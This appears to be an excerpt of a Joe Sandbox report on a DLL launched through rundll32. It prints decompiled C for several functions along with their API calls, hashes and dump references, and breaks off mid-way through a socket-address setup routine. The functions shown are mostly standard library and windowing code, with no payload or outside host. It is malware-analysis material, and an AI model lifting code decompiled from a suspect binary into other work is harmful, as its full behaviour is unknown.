FreeResource.KERNEL32(00000000), ref: 1000C911

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: ba0e54e7ba739e7dbb3db6c45d0c9dd504ce55cc39771a4365ee787ff2243026
Instruction ID: fb1a28c5f31200e3abd4209bdb6f3add133a5505808a0a6cde1b54a47ab738f1
Opcode Fuzzy Hash: ba0e54e7ba739e7dbb3db6c45d0c9dd504ce55cc39771a4365ee787ff2243026
Instruction Fuzzy Hash: 46118F3150076AEFE710DF95C889AAAB3F5FF003D5F218029E84252594D770ED50D760

Uniqueness

Uniqueness Score: -1.00%

Function 1000ADB5, Relevance: 6.1, APIs: 4, Instructions: 56
threadCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E1000ADB5(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t37;
				intOrPtr _t43;
				void* _t45;
				intOrPtr* _t51;
				void* _t52;
				void* _t53;

				_t53 = __eflags;
				_t46 = __ecx;
				_t44 = __ebx;
				_push(4);
				E10017BC1(E10027E86, __ebx, __edi, __esi);
				_t51 = __ecx;
				 *((intOrPtr*)(_t52 - 0x10)) = __ecx;
				E1000B862(__ebx, __ecx, __edi, __ecx, _t53);
				_t54 =  *((intOrPtr*)(_t52 + 8));
				 *((intOrPtr*)(_t52 - 4)) = 0;
				 *_t51 = 0x10029f54;
				if( *((intOrPtr*)(_t52 + 8)) == 0) {
					 *((intOrPtr*)(_t51 + 0x50)) = 0;
				} else {
					_t43 = E1001817A( *((intOrPtr*)(_t52 + 8)));
					_pop(_t46);
					 *((intOrPtr*)(_t51 + 0x50)) = _t43;
				}
				_t45 = E1000D5EC(_t44, 0, _t51, _t54);
				_t55 = _t45;
				if(_t45 == 0) {
					L4:
					E1000A0DB(_t45, _t46, 0, _t51, _t55);
				}
				_t7 = _t45 + 0x74; // 0x74
				_t46 = _t7;
				_t37 = E1000AA21(_t45, _t7, 0, _t51, _t55);
				if(_t37 == 0) {
					goto L4;
				}
				 *((intOrPtr*)(_t37 + 4)) = _t51;
				 *((intOrPtr*)(_t51 + 0x2c)) = GetCurrentThread();
				 *((intOrPtr*)(_t51 + 0x30)) = GetCurrentThreadId();
				 *((intOrPtr*)(_t45 + 4)) = _t51;
				 *((intOrPtr*)(_t51 + 0x44)) = 0;
				 *((intOrPtr*)(_t51 + 0x7c)) = 0;
				 *((intOrPtr*)(_t51 + 0x64)) = 0;
				 *((intOrPtr*)(_t51 + 0x68)) = 0;
				 *((intOrPtr*)(_t51 + 0x54)) = 0;
				 *((intOrPtr*)(_t51 + 0x60)) = 0;
				 *((intOrPtr*)(_t51 + 0x88)) = 0;
				 *((intOrPtr*)(_t51 + 0x58)) = 0;
				 *((short*)(_t51 + 0x92)) = 0;
				 *((short*)(_t51 + 0x90)) = 0;
				 *((intOrPtr*)(_t51 + 0x48)) = 0;
				 *((intOrPtr*)(_t51 + 0x8c)) = 0;
				 *((intOrPtr*)(_t51 + 0x80)) = 0;
				 *((intOrPtr*)(_t51 + 0x84)) = 0;
				 *((intOrPtr*)(_t51 + 0x70)) = 0;
				 *((intOrPtr*)(_t51 + 0x74)) = 0;
				 *((intOrPtr*)(_t51 + 0x94)) = 0;
				 *((intOrPtr*)(_t51 + 0x9c)) = 0;
				 *((intOrPtr*)(_t51 + 0x5c)) = 0;
				 *((intOrPtr*)(_t51 + 0x6c)) = 0;
				 *((intOrPtr*)(_t51 + 0x98)) = 0x200;
				return E10017C60(_t51);
			}

APIs

__EH_prolog3.LIBCMT ref: 1000ADBC

Part of subcall function 1000B862: __EH_prolog3.LIBCMT ref: 1000B869

__strdup.LIBCMT ref: 1000ADDE
GetCurrentThread.KERNEL32 ref: 1000AE0B
GetCurrentThreadId.KERNEL32 ref: 1000AE14

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CurrentH_prolog3Thread$__strdup
String ID:
API String ID: 4206445780-0
Opcode ID: 9c26e9d60202904c8b3007aba5d4454f2b931d5449d83442688f904a073da271
Instruction ID: f8307bcc4145d2f3034cc24c4785684ef343d47fe4738e0b5029f7ba663f9659
Opcode Fuzzy Hash: 9c26e9d60202904c8b3007aba5d4454f2b931d5449d83442688f904a073da271
Instruction Fuzzy Hash: 88217EB4800B50CFE721DF6A858564AFBF8FFA4680F10891FD59A87A25CBB0A581CF45

Uniqueness

Uniqueness Score: -1.00%

Function 1001170E, Relevance: 6.1, APIs: 4, Instructions: 55
windowCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E1001170E(intOrPtr* __ecx) {
				char _v20;
				intOrPtr _v32;
				void* __ebx;
				void* __edi;
				intOrPtr* __esi;
				struct HWND__* _t18;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t33;

				_t28 = __ecx;
				_push(0);
				_t33 = __ecx;
				if( *((intOrPtr*)( *__ecx + 0x120))() != 0) {
					__eax =  *__esi;
					__ecx = __esi;
					__eax =  *((intOrPtr*)( *__esi + 0x170))();
				}
				_t30 = SendMessageA;
				SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
				E1001044A(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
				_t28 = _t33;
				_t33 = E10010DEC(0, _t28, SendMessageA);
				if(_t33 != 0) {
					SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
					E1001044A(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
					_t18 = GetCapture();
					if(_t18 != 0) {
						_t18 = SendMessageA(_t18, 0x1f, 0, 0);
					}
					return _t18;
				} else {
					_push(_t28);
					_v20 = 0x10057298;
					E10017C83( &_v20, 0x1002e2fc);
					asm("int3");
					_push(4);
					E10017BC1(E10027DEC, 0, SendMessageA, _t33);
					_t29 = E10013965(0x104);
					_v32 = _t29;
					_t24 = 0;
					_v20 = 0;
					if(_t29 != 0) {
						_t24 = E1000CF71(_t29);
					}
					return E10017C60(_t24);
				}
			}

APIs

SendMessageA.USER32 ref: 10011738
SendMessageA.USER32 ref: 10011763

Part of subcall function 1001044A: GetTopWindow.USER32(00000000), ref: 10010458

GetCapture.USER32 ref: 10011775
SendMessageA.USER32 ref: 10011784

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: MessageSend$CaptureWindow
String ID:
API String ID: 729421689-0
Opcode ID: 80fe9e985e59ca35730d0e4f98e874e27816f3184ada4d3ba37fa42bed1d0644
Instruction ID: c1fa24ad5068faa30316ff7830c17e6e1fa791912a80157e4ea929c0746033bf
Opcode Fuzzy Hash: 80fe9e985e59ca35730d0e4f98e874e27816f3184ada4d3ba37fa42bed1d0644
Instruction Fuzzy Hash: EF012CB5350219BFF621AB608CC9FBA36ADEB487C4F010539F685AA1E2C6A19C415660

Uniqueness

Uniqueness Score: -1.00%

Function 10013F17, Relevance: 6.1, APIs: 4, Instructions: 55
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E10013F17(void* __ecx, intOrPtr __edx, CHAR* _a4, char* _a8, char _a12) {
				signed int _v8;
				char _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				CHAR* _t21;
				char* _t24;
				intOrPtr _t28;
				void* _t30;
				signed int _t31;

				_t28 = __edx;
				_t13 =  *0x10057a08; // 0xcbf72908
				_v8 = _t13 ^ _t31;
				_t24 = _a8;
				_t30 = __ecx;
				_t29 = _a4;
				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
					E10016DF0( &_v24, 0x10, "%d", _a12);
					_t18 = WritePrivateProfileStringA(_t29, _t24,  &_v24,  *(__ecx + 0x68));
				} else {
					_t30 = E10013ED1(__ecx, _t29);
					if(_t30 != 0) {
						_t21 = RegSetValueExA(_t30, _t24, 0, 4,  &_a12, 4);
						_t29 = _t21;
						RegCloseKey(_t30);
						_t18 = 0 | _t21 == 0x00000000;
					}
				}
				return E100167D5(_t18, _t24, _v8 ^ _t31, _t28, _t29, _t30);
			}

APIs

RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 10013F50
RegCloseKey.ADVAPI32(00000000), ref: 10013F59
_swprintf.LIBCMT ref: 10013F76
WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 10013F87

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ClosePrivateProfileStringValueWrite_swprintf
String ID:
API String ID: 4210924919-0
Opcode ID: 72724b54134d1e17f7023dcd4e88edc389080316b6c32af13a85a47034679497
Instruction ID: 30a1eb16c1be1d822a6ca59f9e75d62d608c78195c8382286e316af6553577e2
Opcode Fuzzy Hash: 72724b54134d1e17f7023dcd4e88edc389080316b6c32af13a85a47034679497
Instruction Fuzzy Hash: 25018076900219BBDB00DF648C85FAF77BCEF48754F104469FA01AB181DA74E94597A4

Uniqueness

Uniqueness Score: -1.00%

Function 1000B244, Relevance: 6.0, APIs: 4, Instructions: 50
windowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E1000B244(void* __ecx, void* __edi, void* __ebp, signed int _a4) {
				void* __ebx;
				void* __esi;
				void* _t16;
				int _t17;
				int _t18;
				struct HWND__* _t19;
				intOrPtr _t25;
				intOrPtr _t33;
				void* _t35;

				_t32 = __edi;
				_t35 = __ecx;
				_t25 =  *((intOrPtr*)(__ecx + 0xc));
				if(_t25 == 0) {
					__eflags =  *((intOrPtr*)(__ecx + 0x14));
					if(__eflags == 0) {
						L3:
						_t17 = E1000A0DB(0, _t25, _t32, _t35, _t39);
						L4:
						asm("sbb edx, edx");
						_t18 = EnableMenuItem( *(_t25 + 4), _t17, ( ~_a4 & 0xfffffffd) + 0x00000003 | 0x00000400);
						L11:
						 *((intOrPtr*)(_t35 + 0x18)) = 1;
						return _t18;
					}
					__eflags = _a4;
					if(_a4 == 0) {
						_push(__edi);
						_t33 =  *((intOrPtr*)(__ecx + 0x14));
						_t19 = GetFocus();
						__eflags = _t19 -  *(_t33 + 0x20);
						if(_t19 ==  *(_t33 + 0x20)) {
							SendMessageA( *(E1000FB5C(0, _t25, __ebp, GetParent( *(_t33 + 0x20))) + 0x20), 0x28, 0, 0);
						}
					}
					_t18 = E10012913( *((intOrPtr*)(_t35 + 0x14)), _a4);
					goto L11;
				}
				if( *((intOrPtr*)(__ecx + 0x10)) == 0) {
					_t17 =  *(__ecx + 8);
					_t39 = _t17 -  *((intOrPtr*)(__ecx + 0x20));
					if(_t17 <  *((intOrPtr*)(__ecx + 0x20))) {
						goto L4;
					}
					goto L3;
				}
				return _t16;
			}

APIs

EnableMenuItem.USER32 ref: 1000B27C

Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC

GetFocus.USER32 ref: 1000B293
GetParent.USER32(?), ref: 1000B2A1
SendMessageA.USER32 ref: 1000B2B4

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: EnableException@8FocusH_prolog3ItemMenuMessageParentSendThrow
String ID:
API String ID: 3849708097-0
Opcode ID: 716c6444658c0fcd22857925786988681d98949d7d446b879da325b0eb7e7aaf
Instruction ID: 6f1bf2e13571d4607552996c72993327e3919edcc1f96bcd7a145644f4ad6856
Opcode Fuzzy Hash: 716c6444658c0fcd22857925786988681d98949d7d446b879da325b0eb7e7aaf
Instruction Fuzzy Hash: FB115B71500A11AFE720DF64CCC9D1EBBF6FF893A5B118A2DF186869A8C731AC45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1001044A, Relevance: 6.0, APIs: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E1001044A(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, int _a12, long _a16, struct HWND__* _a20, struct HWND__* _a24) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t16;
				struct HWND__* _t18;
				struct HWND__* _t20;
				void* _t22;
				void* _t23;
				void* _t24;
				struct HWND__* _t25;

				_t23 = __ecx;
				_t22 = __ebx;
				_t24 = GetTopWindow;
				_t16 = GetTopWindow(_a4);
				while(1) {
					_t25 = _t16;
					if(_t25 == 0) {
						break;
					}
					__eflags = _a24;
					if(__eflags == 0) {
						SendMessageA(_t25, _a8, _a12, _a16);
					} else {
						_t20 = E1000FB83(_t23, _t24, _t25, __eflags, _t25);
						__eflags = _t20;
						if(__eflags != 0) {
							_push(_a16);
							_push(_a12);
							_push(_a8);
							_push( *((intOrPtr*)(_t20 + 0x20)));
							_push(_t20);
							E1001016F(_t22, _t24, _t25, __eflags);
						}
					}
					__eflags = _a20;
					if(_a20 != 0) {
						_t18 = GetTopWindow(_t25);
						__eflags = _t18;
						if(_t18 != 0) {
							E1001044A(_t22, _t23, _t25, _a8, _a12, _a16, _a20, _a24);
						}
					}
					_t16 = GetWindow(_t25, 2);
				}
				return _t16;
			}

APIs

GetTopWindow.USER32(00000000), ref: 10010458
GetTopWindow.USER32(00000000), ref: 10010497
GetWindow.USER32(00000000,00000002), ref: 100104B5

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: bfa56acb45854e1eb2d8939f4edd14d374eedcc28d24ff6845afa1ef48a187dc
Instruction ID: cb0d0bbe13ee34529c330f041d0b53c98759dff42d13bab1c22f515cd31b8fc3
Opcode Fuzzy Hash: bfa56acb45854e1eb2d8939f4edd14d374eedcc28d24ff6845afa1ef48a187dc
Instruction Fuzzy Hash: CD01257620061ABBDF12DF908C44E9F3A6AEF08390F018014FE8458060C7B6D9A2EBA5

Uniqueness

Uniqueness Score: -1.00%

Function 100223DD, Relevance: 6.0, APIs: 4, Instructions: 48
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E100223DD(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;
				void* _t29;

				_t28 = __ebx;
				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E10021CDA(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E10021DC6(_t28, _t29, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E100222E5(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E1002222C(_t29, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

APIs

__cftof_l.LIBCMT ref: 10022401

Part of subcall function 1002222C: __fltout2.LIBCMT ref: 10022256

__cftog_l.LIBCMT ref: 10022427
__cftoe_l.LIBCMT ref: 10022459

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
Instruction ID: 8dbc0b72f00ea763734ae0c8b1a7260823f108f727578f4f2c9ad294c4834352
Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
Instruction Fuzzy Hash: 4201287A40014ABBCF12AEC4EC41CEE3F66FB18294B958515FE1858531D236D9B2AB81

Uniqueness

Uniqueness Score: -1.00%

Function 1000FE47, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E1000FE47(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t9;
				struct HWND__* _t10;
				void* _t14;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				void* _t18;

				_t14 = __ecx;
				_t13 = __ebx;
				_t9 = GetDlgItem(_a4, _a8);
				_t15 = GetTopWindow;
				_t16 = _t9;
				if(_t16 == 0) {
					L6:
					_t10 = GetTopWindow(_a4);
					while(1) {
						_t17 = _t10;
						__eflags = _t17;
						if(_t17 == 0) {
							goto L10;
						}
						_t10 = E1000FE47(_t13, _t14, _t17, _a8, _a12);
						__eflags = _t10;
						if(_t10 == 0) {
							_t10 = GetWindow(_t17, 2);
							continue;
						}
						goto L10;
					}
				} else {
					if(GetTopWindow(_t16) == 0) {
						L3:
						_push(_t16);
						if(_a12 == 0) {
							return E1000FB5C(_t13, _t14, _t18);
						}
						_t10 = E1000FB83(_t14, _t15, _t16, __eflags);
						__eflags = _t10;
						if(_t10 == 0) {
							goto L6;
						}
					} else {
						_t10 = E1000FE47(__ebx, _t14, _t16, _a8, _a12);
						if(_t10 == 0) {
							goto L3;
						}
					}
				}
				L10:
				return _t10;
			}

APIs

GetDlgItem.USER32 ref: 1000FE52
GetTopWindow.USER32(00000000), ref: 1000FE65

Part of subcall function 1000FE47: GetWindow.USER32(00000000,00000002), ref: 1000FEAC

GetTopWindow.USER32(?), ref: 1000FE95

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: c12eecb807ab7f0029ae595babd55ab8876d87e96eec09ecdb4c3faaf2806783
Instruction ID: 3243c1bb31c4da8a8ed3b9d60ce207d24ba739ee5e1db1414c8eeda74806f304
Opcode Fuzzy Hash: c12eecb807ab7f0029ae595babd55ab8876d87e96eec09ecdb4c3faaf2806783
Instruction Fuzzy Hash: 07018F374016AAB7EB229F60CC00AAF3A98EF447D0F018018FD049153AD731DA12BAA0

Uniqueness

Uniqueness Score: -1.00%

Function 1001D6BC, Relevance: 6.0, APIs: 4, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E1001D6BC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x1002fae0);
				E1001984C(__ebx, __edi, __esi);
				_t31 = E1001BF79(__edx, __edi, _t35);
				_t15 =  *0x1005826c; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E1001A549(0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x10058170; // 0x43e1328
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x10057d48;
								if(__eflags != 0) {
									_push(_t33);
									E10016380(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x10058170; // 0x43e1328
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x10058170; // 0x43e1328
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E1001D757();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E10017DA6(_t25, _t29, _t31, 0x20);
				}
				return E10019891(_t33);
			}

APIs

Part of subcall function 1001BF79: __getptd_noexit.LIBCMT ref: 1001BF7A
Part of subcall function 1001BF79: __amsg_exit.LIBCMT ref: 1001BF87

__amsg_exit.LIBCMT ref: 1001D6E8
__lock.LIBCMT ref: 1001D6F8
InterlockedDecrement.KERNEL32(?), ref: 1001D715
InterlockedIncrement.KERNEL32(043E1328), ref: 1001D740

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
String ID:
API String ID: 2880340415-0
Opcode ID: c820c896aabaa0a2095c39d05bd9b26938a44304a92efda62120de517e880afa
Instruction ID: ba7e7af5003a78fddfad0021ce05134b2f36e9a59f0d2c47ef46babd1389d2ef
Opcode Fuzzy Hash: c820c896aabaa0a2095c39d05bd9b26938a44304a92efda62120de517e880afa
Instruction Fuzzy Hash: 95016D39904A21EBEB41FB65988679D77A4FF05790F11410AE804AF291DB34E9C2CB95

Uniqueness

Uniqueness Score: -1.00%

Function 100126F9, Relevance: 6.0, APIs: 4, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100126F9(void* __ecx, CHAR* _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HRSRC__* _t8;
				void* _t9;
				void* _t11;
				void* _t14;
				void* _t15;
				void* _t16;
				struct HINSTANCE__* _t17;
				void* _t18;

				_t14 = 0;
				_t11 = 0;
				_t19 = _a4;
				_t18 = __ecx;
				if(_a4 == 0) {
					L4:
					_t16 = E100122B0(_t11, _t18, _t11);
					if(_t11 != 0 && _t14 != 0) {
						FreeResource(_t14);
					}
					return _t16;
				}
				_t17 =  *(E1000D5EC(0, 0, _t15, _t19) + 0xc);
				_t8 = FindResourceA(_t17, _a4, 0xf0);
				if(_t8 == 0) {
					goto L4;
				}
				_t9 = LoadResource(_t17, _t8);
				_t14 = _t9;
				if(_t14 != 0) {
					_t11 = LockResource(_t14);
					goto L4;
				}
				return _t9;
			}

APIs

FindResourceA.KERNEL32(?,?,000000F0), ref: 1001271B
LoadResource.KERNEL32(?,00000000,?,?,?,?,1000C840,?,?,10008B31), ref: 10012727
LockResource.KERNEL32(00000000,?,?,?,?,1000C840,?,?,10008B31), ref: 10012734
FreeResource.KERNEL32(00000000,00000000,?,?,?,?,1000C840,?,?,10008B31), ref: 1001274F

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 8a3f5fca82a0f9630a7b8cc452aba64c847f2dafa8f29946bde4c5ad79aa4676
Instruction ID: 32ecfa8a0ceb179aec2dc768c20ccd4f8790d9104fa4174b83ef058a4c527ff5
Opcode Fuzzy Hash: 8a3f5fca82a0f9630a7b8cc452aba64c847f2dafa8f29946bde4c5ad79aa4676
Instruction Fuzzy Hash: 54F090762042226FA3019B675C88A3BB7ECEFC55E2B110039FE04D6291EE35CC629771

Uniqueness

Uniqueness Score: -1.00%

Function 10001360, Relevance: 6.0, APIs: 4, Instructions: 40
networkCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E10001360(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				short _v20;
				short _v22;
				char _v24;
				intOrPtr _v28;
				signed int _t15;
				short _t18;
				intOrPtr _t31;
				signed int _t33;

				_t15 =  *0x10057a08; // 0xcbf72908
				_v8 = _t15 ^ _t33;
				_v28 = __ecx;
				_t18 = E100174D0(_t31,  &_v24, 0, 0x10);
				_v24 = 2;
				__imp__#11(_a4);
				_v20 = _t18;
				__imp__#9(_a8);
				_v22 = _t18;
